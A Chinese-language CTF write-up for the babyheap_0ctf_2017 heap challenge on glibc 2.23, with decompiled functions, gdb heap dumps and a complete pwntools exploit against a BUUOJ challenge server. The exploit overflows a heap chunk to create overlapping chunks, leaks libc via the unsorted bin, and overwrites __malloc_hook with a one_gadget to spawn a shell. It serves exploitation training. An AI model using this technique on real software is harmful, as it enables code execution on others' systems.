Overlap 2.23libc 例题

参考资料:https://www.cnblogs.com/youdiscovered1t/p/19109746

babyheap_0ctf_2017(Unsortedbin + Overlap)

1774869383637-54324b83-9e68-4e51-ae6d-5db276b03bd0.png

简单整理一下 main 函数:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
__int64 __fastcall main(char *a1, char **a2, char **a3)
{
  char *v4; // [rsp+8h] [rbp-8h]

  v4 = mmap_();
  while ( 1 )
  {
    menu(a1, a2);
    switch ( atoi() )
    {
      case 1LL:
        a1 = v4;
        allocate(v4);
        break;
      case 2LL:
        a1 = v4;
        fill(v4);
        break;
      case 3LL:
        a1 = v4;
        Free(v4);
        break;
      case 4LL:
        a1 = v4;
        Dump(v4);
        break;
      case 5LL:
        return 0;
      default:
        continue;
    }
  }
}
1
2
3
4
5
6
7
8
9
int menu()
{
  puts("1. Allocate");
  puts("2. Fill");
  puts("3. Free");
  puts("4. Dump");
  puts("5. Exit");
  return printf("Command: ");
}

Allocate

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
void __fastcall allocate(__int64 a1)
{
  int n15; // [rsp+10h] [rbp-10h]
  int size; // [rsp+14h] [rbp-Ch]
  void *v3; // [rsp+18h] [rbp-8h]

  for ( n15 = 0; n15 <= 15; ++n15 )
  {
    if ( !*(_DWORD *)(24LL * n15 + a1) )
    {
      printf("Size: ");
      size = atoi();
      if ( size > 0 )
      {
        if ( size > 4096 )
          size = 4096;
        v3 = calloc(size, 1u);
        if ( !v3 )
          exit(-1);
        *(_DWORD *)(24LL * n15 + a1) = 1;
        *(_QWORD *)(a1 + 24LL * n15 + 8) = size;
        *(_QWORD *)(a1 + 24LL * n15 + 16) = v3;
        printf("Allocate Index %d\n", n15);
      }
      return;
    }
  }
}

先遍历 16 个索引,寻找到第一个未在使用的索引,读取用户输入的数据大小,要求小于 4096 个字节

分配内存:calloc(j,1) = 分配 j 字节,且自动初始化为0(区别于malloc) v3 =calloc ( j, 1u ) ;

if ( !*(_DWORD *)(24LL * i + a1) ):

1
2
3
4
5
6
24 分别指的是 
[ 1. *(_DWORD *)(24LL * i + a1) = 1;       ]         // “1”表示正在使用中
[ 2. *(_QWORD *)(a1 + 24LL * i + 8) = size;]         // 申请chunk的大小 
[ 3. *(_QWORD *)(a1 + 24LL * i + 16) = v3; ]         // 这里用于存放用户数据的地址
DWORD 在 0x4-0x7 进行四字节填充,剩下的进行 8 字节栈对齐。
一共是三个部分,每个部分是 8 个字节,一共 24 个字节的大小。

Fill

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
__int64 __fastcall fill(__int64 a1)
{
  __int64 index; // rax
  int n0x10_1; // [rsp+18h] [rbp-8h]
  int n0x10_2; // [rsp+1Ch] [rbp-4h]

  printf("Index: ");
  index = atoi();
  n0x10_1 = index;
  if ( (unsigned int)index < 0x10 )
  {
    index = *(unsigned int *)(24LL * (int)index + a1);
    if ( (_DWORD)index == 1 )
    {
      printf("Size: ");
      index = atoi();
      n0x10_2 = index;
      if ( (int)index > 0 )
      {
        printf("Content: ");
        return Read(*(_QWORD *)(24LL * n0x10_1 + a1 + 16), n0x10_2);
      }
    }
  }
  return index;
}

这里不难解释:首先读取用户输入的 index,然后寻找 index 与之对应的 chunk ->

index = *(unsigned int *)(24LL * (int)index + a1);

然后进行 if ((_DWORD)index == 1 )的判断,这前面也有提到过,如果等于 1,就可以进行输入

printf(“Content: “);

return Read(*(_QWORD *)(24LL * n0x10_1 + a1 + 16), n0x10_2);

这里还没有介绍已经修改过的 read 函数,我们进去看一看:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
unsigned __int64 __fastcall Read(__int64 a1, unsigned __int64 size)
{
  unsigned __int64 i; // [rsp+10h] [rbp-10h]
  ssize_t v4; // [rsp+18h] [rbp-8h]

  if ( !size )
    return 0;
  i = 0;
  while ( i < size )
  {
    v4 = read(0, (void *)(i + a1), size - i);
    if ( v4 > 0 )
    {
      i += v4;
    }
    else if ( *_errno_location() != 11 && *_errno_location() != 4 )
    {
      return i;
    }
  }
  return i;
}

就是简单的要求 size > 0,然后可以执行 read 函数。整个函数的作用呢就是为了防止 alarm 中断,把数据分批次读取到我们的 data 区,本质就是 read 函数读取 chunk 内容。

free

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
__int64 __fastcall Free(__int64 a1)
{
  __int64 index; // rax
  int index_0; // [rsp+1Ch] [rbp-4h]

  printf("Index: ");
  index = atoi();
  index_0 = index;
  if ( (unsigned int)index < 0x10 )
  {
    index = *(unsigned int *)(24LL * (int)index + a1);
    if ( (_DWORD)index == 1 )
    {
      *(_DWORD *)(24LL * index_0 + a1) = 0;
      *(_QWORD *)(24LL * index_0 + a1 + 8) = 0;
      free(*(void **)(24LL * index_0 + a1 + 16));
      index = 24LL * index_0 + a1;
      *(_QWORD *)(index + 16) = 0;
    }
  }
  return index;
}

释放后全部置 0,不存在 UAF

Dump

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
unsigned int __fastcall Dump(__int64 a1)
{
  unsigned int index; // eax
  int index_0; // [rsp+1Ch] [rbp-4h]

  printf("Index: ");
  index = atoi();
  index_0 = index;
  if ( index < 0x10 )
  {
    index = *(_DWORD *)(24LL * (int)index + a1);
    if ( index == 1 )
    {
      puts("Content: ");
      write_0(*(_QWORD *)(24LL * index_0 + a1 + 16), *(_QWORD *)(24LL * index_0 + a1 + 8));
      return puts(s_);
    }
  }
  return index;
}

输出程序,把对应索引的 user_data 存入的数据都打印出来。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
unsigned __int64 __fastcall write_0(__int64 a1, unsigned __int64 a2)
{
  unsigned __int64 v3; // [rsp+10h] [rbp-10h]
  ssize_t v4; // [rsp+18h] [rbp-8h]

  v3 = 0;
  while ( v3 < a2 )
  {
    v4 = write(1, (const void *)(v3 + a1), a2 - v3);
    if ( v4 > 0 )
    {
      v3 += v4;
    }
    else if ( *_errno_location() != 11 && *_errno_location() != 4 )
    {
      return v3;
    }
  }
  return v3;
}

EXP:

封装函数

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
def allocate(p,size):
    p.sendlineafter(b'Command: ',b"1")
    p.sendlineafter(b'Size: ',str(size))

def fill(p,index,content):
    p.sendlineafter(b'Command: ',b"2")
    p.sendlineafter(b'Index: ',str(index))
    p.sendlineafter(b'Size: ',str(len(content)))
    p.sendlineafter(b'Content: ',content)

def free(p,index):
    p.sendlineafter(b'Command: ',b"3")
    p.sendlineafter(b'Index: ',str(index))

def dump(p,index):
    p.sendlineafter(b'Command: ',b"4")
    p.sendlineafter(b'Index: ',str(index))

创建堆块

我们首先需要考虑的是我们需要多少堆块:chunk0 用来堆溢出修改 fastbin 的 fd 指针

1
2
3
4
5
6
7
allocate(p,0x10) # chunk 0 
allocate(p,0x10) # chunk 1
allocate(p,0x10) # chunk 2
allocate(p,0x10) # chunk 3
allocate(p,0x80) # chunk 4
gdb.attach(p)
pause()
1774873973929-39c2e238-8622-40d0-8ab2-d06b7d9cf156.png

释放堆块到 fastbin 当中:

1
2
3
4
free(p,1)
free(p,2)
# gdb.attach(p)
# pause()
1774874074973-849cd843-02b4-4975-84f1-ba4a2342b516.png

修改堆块,造成堆重叠

修改 fastbin 的 fd 指针,让其指向 chunk4,让 chunk4 加入 fastbin 链表当中

1
2
3
4
5
payload = p64(0)*3 + p64(0x21) + p64(0)*3 + p64(0x21) + p8(0x80)

fill(p,0,payload)
# gdb.attach(p)
# pause()

此时 chunk4 已经放进了 fastbin 链表当中,且 chunk2 指向 chunk4:chunk2 -> chunk4

1
2
3
pwndbg> bins
fastbins
0x20: 0x55b106af3040 —▸ 0x55b106af3080 ◂— 0
1774874174484-7b82b1c7-b249-4549-bb2f-5da3e6cb7d48.png 
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
pwndbg> x/50gx 0x55b106af3000
0x55b106af3000: 0x0000000000000000      0x0000000000000021 ==>chunk0
0x55b106af3010: 0x0000000000000000      0x0000000000000000
0x55b106af3020: 0x0000000000000000      0x0000000000000021 ==>chunk1
0x55b106af3030: 0x0000000000000000      0x0000000000000000
0x55b106af3040: 0x0000000000000000      0x0000000000000021 ==>fastbin
0x55b106af3050: 0x000055b106af3080      0x0000000000000000
0x55b106af3060: 0x0000000000000000      0x0000000000000021 ==>chunk3
0x55b106af3070: 0x0000000000000000      0x0000000000000000
0x55b106af3080: 0x0000000000000000      0x0000000000000091 ==>chunk4
0x55b106af3090: 0x0000000000000000      0x0000000000000000
0x55b106af30a0: 0x0000000000000000      0x0000000000000000
0x55b106af30b0: 0x0000000000000000      0x0000000000000000
0x55b106af30c0: 0x0000000000000000      0x0000000000000000
0x55b106af30d0: 0x0000000000000000      0x0000000000000000
0x55b106af30e0: 0x0000000000000000      0x0000000000000000
0x55b106af30f0: 0x0000000000000000      0x0000000000000000
0x55b106af3100: 0x0000000000000000      0x0000000000000000
0x55b106af3110: 0x0000000000000000      0x0000000000020ef1 ==> topchunk
0x55b106af3120: 0x0000000000000000      0x0000000000000000
0x55b106af3130: 0x0000000000000000      0x0000000000000000

新建两个堆块实现双指

由于 fastbin 的先进后出原则,chunk2->chunk4,先出 chunk2,因此需要进行两次 malloc 才可以调用chunk4

在此之前,为了防止进行 malloc(0x10)找到大小为 0x90 的 chunk4,这里还要对 chunk4 的 size 进行修改:

1
2
3
4
5
6
7
payload = p64(0)*3 + p8(0x21)
fill(p,3,payload)

allocate(p,0x10)
allocate(p,0x10) 
gdb.attach(p)
pause()

我们调用了 chunk2(bins) 和 chunk4(bins)先后 malloc(0x10);

由于 chunk2 fd 指向 chunk4,让其内容指针指向 index4,chunk4 也因为本身内容指针就指向 index4 而实现了 chunk2 和 chunk4 的内容指针同时指向了 index4 的内容:实现双指

我们通过 vmmap 在 mmap 当中寻找到开辟的空间,存储 index 的信息:x/50gx 一点一点翻 –>

1774874741060-3931914c-efa3-4404-b62d-a255c0de2860.png 1774874715811-a0f8b797-0a58-44ab-8bdb-fd022dcd0445.png 
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
pwndbg> heap
Allocated chunk | PREV_INUSE
Addr: 0x5623cf982000
Size: 0x20 (with flag bits: 0x21)

Allocated chunk | PREV_INUSE
Addr: 0x5623cf982020
Size: 0x20 (with flag bits: 0x21)

Allocated chunk | PREV_INUSE
Addr: 0x5623cf982040
Size: 0x20 (with flag bits: 0x21)

Allocated chunk | PREV_INUSE
Addr: 0x5623cf982060
Size: 0x20 (with flag bits: 0x21)

Allocated chunk | PREV_INUSE
Addr: 0x5623cf982080
Size: 0x20 (with flag bits: 0x21)

Allocated chunk
Addr: 0x5623cf9820a0
Size: 0x00 (with flag bits: 0x00)


0xe8bdc93ad00:  0x0000000000000001                0x0000000000000010 ==>index0
0xe8bdc93ad10:  0x00005623cf982010                0x0000000000000001
0xe8bdc93ad20:  0x0000000000000010 ==>index1      0x00005623cf982050 
0xe8bdc93ad30:  0x0000000000000001                0x0000000000000010 ==>index2
0xe8bdc93ad40:  0x00005623cf982090                0x0000000000000001
0xe8bdc93ad50:  0x0000000000000010 ==>index3      0x00005623cf982070
0xe8bdc93ad60:  0x0000000000000001                0x0000000000000080 ==>index4
0xe8bdc93ad70:  0x00005623cf982090                0x0000000000000000
0xe8bdc93ad80:  0x0000000000000000                0x0000000000000000

我们可以发现 index2 和 index4 的内容指针确实指向了 chunk4 的 size 处,实现了双指。

free(4) to Unsortedbin

先回顾一下进行下一步之前的堆情况:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
pwndbg> x/50gx 0x55b08dd57000
0x55b08dd57000: 0x0000000000000000      0x0000000000000021 ==> chunk0
0x55b08dd57010: 0x0000000000000000      0x0000000000000000
0x55b08dd57020: 0x0000000000000000      0x0000000000000021 ==> chunk1
0x55b08dd57030: 0x0000000000000000      0x0000000000000000
0x55b08dd57040: 0x0000000000000000      0x0000000000000021 ==> chunk2
0x55b08dd57050: 0x0000000000000000      0x0000000000000000
0x55b08dd57060: 0x0000000000000000      0x0000000000000021 ==> chunk3
0x55b08dd57070: 0x0000000000000000      0x0000000000000000
0x55b08dd57080: 0x0000000000000000      0x0000000000000021 ==> chunk4
0x55b08dd57090: 0x0000000000000000      0x0000000000000000
0x55b08dd570a0: 0x0000000000000000      0x0000000000000000
0x55b08dd570b0: 0x0000000000000000      0x0000000000000000
0x55b08dd570c0: 0x0000000000000000      0x0000000000000000
0x55b08dd570d0: 0x0000000000000000      0x0000000000000000
0x55b08dd570e0: 0x0000000000000000      0x0000000000000000
0x55b08dd570f0: 0x0000000000000000      0x0000000000000000
0x55b08dd57100: 0x0000000000000000      0x0000000000000000
0x55b08dd57110: 0x0000000000000000      0x0000000000020ef1 ==> top_chunk
0x55b08dd57120: 0x0000000000000000      0x0000000000000000


我们为了让 chunk4 放入 Unsortedbin 当中执行 attack 需要把他的 size 修改回去,去泄露 main_arena 的地址。因为 UnSortedbin 头指针指向的是 main_arena + 88。

不过同时为了防止该 chunk 和 top_chunk 进行合并,我们需要再创建一个 chunk 使其与 top_chunk 分隔开:

1
2
3
4
5
payload = p64(0) * 3 + p64(0x91)
fill(p,3,payload)
allocate(p,0x80)

free(p,4)
1774875483947-c740d66a-a145-4be8-9d46-2b0ca98602d3.png

这样让 chunk4 释放到 UnSortedbin 当中,指向 main_arena + 88

寻找偏移

88 = 0x58,main_arena 在 ubuntu16.04 与 libc_base 的偏移为 0x3c4b20

1
2
offset_unsortedbin = 0x58
offset_main_arena = 0x3c4b20

泄露 fd 指针值寻找 libc_base

我们知道,chunk2 和 4 都指向 index4,打印 chunk2,此时 chunk4 已经放入了 UnSortedbin 当中,他的 fd 和 bk 指针都指向 main_arena + 88 , 打印 chunk2 的内容指针也就相当于是泄露了 main_arena + 88 的地址。

1
2
3
4
5
6
7
8
9
dump(p,2)
p.recvline(2)

leak_bin1 = u64(p.recv(8))

info(hex(leak_bin1))
libc_base = leak_bin1 - offset_unsortedbin - offset_main_arena

info(f'leaked_libc_base : {hex(int(libc_base))}')
1774875714377-f4aecff2-790a-4a42-ba4d-7b059b24fd14.png

顺手就计算了 libc_base 的基地址。

创建 fastbin 为 fastbin_attack 做准备:

取 chunk 到 fastbin 当中进行 fastbin_attack

1
2
3
allocate(p,0x60)
free(p,4)
gdb.attach(p)
1774877719925-d555d9d7-82c1-4771-89ec-c3109d4c640f.png 
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
pwndbg> x/50gx 0x55b13765f000
0x55b13765f000: 0x0000000000000000      0x0000000000000021 ==> chunk0
0x55b13765f010: 0x0000000000000000      0x0000000000000000
0x55b13765f020: 0x0000000000000000      0x0000000000000021 ==> chunk1
0x55b13765f030: 0x0000000000000000      0x0000000000000000
0x55b13765f040: 0x0000000000000000      0x0000000000000021 ==> chunk2
0x55b13765f050: 0x0000000000000000      0x0000000000000000
0x55b13765f060: 0x0000000000000000      0x0000000000000021 ==> chunk3
0x55b13765f070: 0x0000000000000000      0x0000000000000000
0x55b13765f080: 0x0000000000000000      0x0000000000000071 ==> fastbin
0x55b13765f090: 0x0000000000000000      0x0000000000000000
0x55b13765f0a0: 0x0000000000000000      0x0000000000000000
0x55b13765f0b0: 0x0000000000000000      0x0000000000000000
0x55b13765f0c0: 0x0000000000000000      0x0000000000000000
0x55b13765f0d0: 0x0000000000000000      0x0000000000000000
0x55b13765f0e0: 0x0000000000000000      0x0000000000000000
0x55b13765f0f0: 0x0000000000000000      0x0000000000000021 ==> unsortedbin
0x55b13765f100: 0x00007f3a62fc3b78      0x00007f3a62fc3b78 ==> fd&bk = main_arena + 88
0x55b13765f110: 0x0000000000000020      0x0000000000000090
0x55b13765f120: 0x0000000000000000      0x0000000000000000
0x55b13765f130: 0x0000000000000000      0x0000000000000000
0x55b13765f140: 0x0000000000000000      0x0000000000000000
0x55b13765f150: 0x0000000000000000      0x0000000000000000
0x55b13765f160: 0x0000000000000000      0x0000000000000000

申请伪堆块

1
2
3
4
5
payload = p64(libc_base + 0x3c4aed) # malloc_hook
fill(p,2,payload)
allocate(p,0x60) #chunk4
allocate(p,0x60) #chunk6
gdb.attach(p)
1774877984430-a71ec731-382d-4770-b9a6-e173a2d96414.png 
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
pwndbg> x/80gx  0x562335eb7000
0x562335eb7000: 0x0000000000000000      0x0000000000000021 ==> chunk0
0x562335eb7010: 0x0000000000000000      0x0000000000000000
0x562335eb7020: 0x0000000000000000      0x0000000000000021 ==> chunk1
0x562335eb7030: 0x0000000000000000      0x0000000000000000
0x562335eb7040: 0x0000000000000000      0x0000000000000021 ==> chunk2
0x562335eb7050: 0x0000000000000000      0x0000000000000000
0x562335eb7060: 0x0000000000000000      0x0000000000000021 ==> chunk3
0x562335eb7070: 0x0000000000000000      0x0000000000000000
0x562335eb7080: 0x0000000000000000      0x0000000000000071 ==> chunk4
0x562335eb7090: 0x0000000000000000      0x0000000000000000
0x562335eb70a0: 0x0000000000000000      0x0000000000000000
0x562335eb70b0: 0x0000000000000000      0x0000000000000000
0x562335eb70c0: 0x0000000000000000      0x0000000000000000
0x562335eb70d0: 0x0000000000000000      0x0000000000000000
0x562335eb70e0: 0x0000000000000000      0x0000000000000000
0x562335eb70f0: 0x0000000000000000      0x0000000000000021 ==> unsortedbin
0x562335eb7100: 0x00007f09611c3b78      0x00007f09611c3b78
0x562335eb7110: 0x0000000000000020      0x0000000000000090 ==> chunk6
0x562335eb7120: 0x0000000000000000      0x0000000000000000
0x562335eb7130: 0x0000000000000000      0x0000000000000000
0x562335eb7140: 0x0000000000000000      0x0000000000000000
0x562335eb7150: 0x0000000000000000      0x0000000000000000
0x562335eb7160: 0x0000000000000000      0x0000000000000000
0x562335eb7170: 0x0000000000000000      0x0000000000000000
0x562335eb7180: 0x0000000000000000      0x0000000000000000
0x562335eb7190: 0x0000000000000000      0x0000000000000000
0x562335eb71a0: 0x0000000000000000      0x0000000000020e61 ==> top_chunk

1
2
3
4
payload = p8(0)*3 + p64(0)*2 + p64(libc_base + 0x4526a) #one_gadgets

fill(p,6,payload)
allocate(p,255)

总 exp

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
from pwn import *

libc = ELF("./x64libc-2.23.so")
# libc = ELF('/home/kali/Desktop/glibc-all-in-one/libs/2.23-0ubuntu3_amd64/libc-2.23.so')

context(arch="amd64",os="linux",log_level="debug")
# context.terminal=["tmux","splitw","-h"]

p = remote("node5.buuoj.cn",27087)
# p = process('./babyheap_0ctf_2017')
# elf = ELF('./babyheap_0ctf_2017')
	

def allocate(p,size):
    p.sendlineafter(b'Command: ',b"1")
    p.sendlineafter(b'Size: ',str(size))

def fill(p,index,content):
    p.sendlineafter(b'Command: ',b"2")
    p.sendlineafter(b'Index: ',str(index))
    p.sendlineafter(b'Size: ',str(len(content)))
    p.sendlineafter(b'Content: ',content)

def free(p,index):
    p.sendlineafter(b'Command: ',b"3")
    p.sendlineafter(b'Index: ',str(index))

def dump(p,index):
    p.sendlineafter(b'Command: ',b"4")
    p.sendlineafter(b'Index: ',str(index))


allocate(p,0x10) # chunk 0 
allocate(p,0x10) # chunk 1
allocate(p,0x10) # chunk 2
allocate(p,0x10) # chunk 3
allocate(p,0x80) # chunk 4
# gdb.attach(p)
# pause()

free(p,1)
free(p,2)
# gdb.attach(p)
# pause()

payload = p64(0)*3 + p64(0x21) + p64(0)*3 + p64(0x21) + p8(0x80)

fill(p,0,payload)
# gdb.attach(p)
# pause()

payload = p64(0)*3 + p8(0x21)
fill(p,3,payload)

allocate(p,0x10)
allocate(p,0x10) 
# gdb.attach(p)
# pause()

payload = p64(0) * 3 + p64(0x91)
fill(p,3,payload)

allocate(p,0x80)

free(p,4)
# gdb.attach(p)

offset_unsortedbin = 0x58
offset_main_arena = 0x3c4b20

dump(p,2)

p.recvline(2)

leak_bin1 = u64(p.recv(8))

info(f'[][][][]leak_bin1 is:{hex(leak_bin1)}')
libc_base = leak_bin1 - offset_unsortedbin - offset_main_arena

info(f'[][][][]leaked_libc_base : {hex(int(libc_base))}')
# gdb.attach(p)
# pause()

allocate(p,0x60)
free(p,4)
# gdb.attach(p)

malloc_hook = libc_base + 0x3c4aed
info(f'[][][][]malloc_hook --> {hex(malloc_hook)}')
#gdb.attach(p)
#pause()
payload = p64(malloc_hook) # malloc_hook
fill(p,2,payload)
allocate(p,0x60)
allocate(p,0x60)
# gdb.attach(p)

one_gadgets = libc_base + 0x4526a
info(f'[][][][]one_gadgets --> {hex(one_gadgets)}')
payload = p8(0)*3 + p64(0)*2 + p64(one_gadgets) #one_gadgets

fill(p,6,payload)
# gdb.attach(p)
allocate(p,255)

p.interactive()


更新: 2026-03-31 10:49:47
原文: https://www.yuque.com/idcm/wnemg9/hkulgqzusykvhx6p